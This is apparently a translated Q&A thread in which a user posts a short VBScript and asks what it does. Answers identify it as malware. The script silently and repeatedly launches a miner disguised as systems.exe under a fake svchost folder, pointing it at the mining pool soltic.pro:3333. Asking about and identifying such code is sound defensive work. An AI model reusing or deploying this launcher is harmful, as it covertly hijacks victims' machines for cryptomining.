我需要知道这个脚本的作用:
dim WshShell
set WshShell = wscript.createObject("WScript.Shell")
WScript.Sleep(15000)
Do While 4=4
On Error Resume Next
WshShell.Run "C:\ProgramData\svchost\systems.exe -a cryptonight -o soltic.pro:3333",0,true
If Err.Number <> 0 Then
WScript.Quit
End if
WScript.Sleep(50000)
Loop
并且运行正确吗?
答案 0 :(得分:2)
这似乎是与CryptoNight挖掘软件相关的恶意软件。
答案 1 :(得分:0)
它启动了一个名为systems.exe
的外部应用程序,它看起来像一个加密器。